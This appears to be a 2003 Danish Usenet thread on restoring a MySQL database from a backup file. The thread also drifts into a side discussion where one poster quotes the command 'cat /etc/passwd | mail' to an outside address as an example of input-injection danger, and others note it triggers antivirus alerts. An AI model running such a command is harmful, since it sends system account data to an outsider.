mysql genoprette fil
Fra : Michael Andreasen

Dato : 02-01-03 18:49

ups.. der røg lige 1.5 MB sql data :(

Heldigvis har jeg en 2 dage gammel backup.. men jeg kan ikke rigtigt hitte
ud af pipe backup.sql ind i min database?

Nogen der kan hjælpe?

Mvh
Michael

Fra : Michael Andreasen

Dato : 02-01-03 18:58

mysql -u bruger < backup.sql

var det hele

Fra : Kim Emax

Dato : 03-01-03 16:13

"Michael Andreasen" <maskinen2000@hotmail.com> wrote

> mysql -u bruger < backup.sql
>
> var det hele

eller når du nu selv var inde på pipe, så:

cat backup.sql | mysql -u bruger

--
Kim Emax

Fra : Thomas

Dato : 04-01-03 11:05

http://www.sektorn.mooo.com/era/unix/award.html#cat

--
Don't waste space

Fra : Kim Emax

Dato : 06-01-03 10:58

"Thomas" <inthenews@corell.dk> wrote

> http://www.sektorn.mooo.com/era/unix/award.html#cat

hehe...

"using cat on a single file to view it from the command line is a valid use
of cat"

Desuden er det vist dig, der i sin tid ofte nævnte problemer med inputs,
hvor folk kunne lave "cat /etc/passwd | mail thomas@dontwaste.space"?

--
Kim Emax

Fra : Kim Emax

Dato : 06-01-03 18:16

Kim Emax wrote:

> Desuden er det vist dig, der i sin tid ofte nævnte problemer med
> inputs, hvor folk kunne lave "cat /etc/passwd | mail
> thomas@dontwaste.space"?

Er der andre end mig, der får en advarsel om en unix.penguin virus, når de
læser min forrige posting?

--
Kim Emax

Fra : Sonni Skammelsen

Dato : 06-01-03 19:47

"Kim Emax" <newsgroup@fjerndette-emax.dk> wrote in message
> Kim Emax wrote:
>
> Er der andre end mig, der får en advarsel om en unix.penguin virus, når de
> læser min forrige posting?

Nej du er ikke den eneste, men prøv at læse din cat og pipe, og kom med et
gæt på hvorfor den skriver, sammenholdt med hvad den virus gør.

/Sonni

Fra : Kim Emax

Dato : 06-01-03 20:39

Sonni Skammelsen wrote:

> Nej du er ikke den eneste, men prøv at læse din cat og pipe, og kom
> med et gæt på hvorfor den skriver, sammenholdt med hvad den virus gør.

så mit virusprogram reagerer på cat og pipe i samme linie, er det det du
siger?

--
Take Care
Kim Emax - Freelance programmør

Fra : Sonni Skammelsen

Dato : 06-01-03 21:06

"Kim Emax" <newsgroup@fjerndette-emax.dk> wrote in message news:eXkS9.26542>
> så mit virusprogram reagerer på cat og pipe i samme linie, er det det du
> siger?

øh nej, men det reagerer på at du lavet en cat at en password fil og piper
den over
i mail så den kan sendes, og det er lige det som unix.penquin gør i et
shellscript
hvis du læser definitionen af denne virus.

/Sonni

Fra : Kim Emax

Dato : 07-01-03 10:26

"Sonni Skammelsen" <news@sonni.org> wrote

> [...]
> shellscript
> hvis du læser definitionen af denne virus.

ok, det var det, jeg regnede med

--
Kim Emax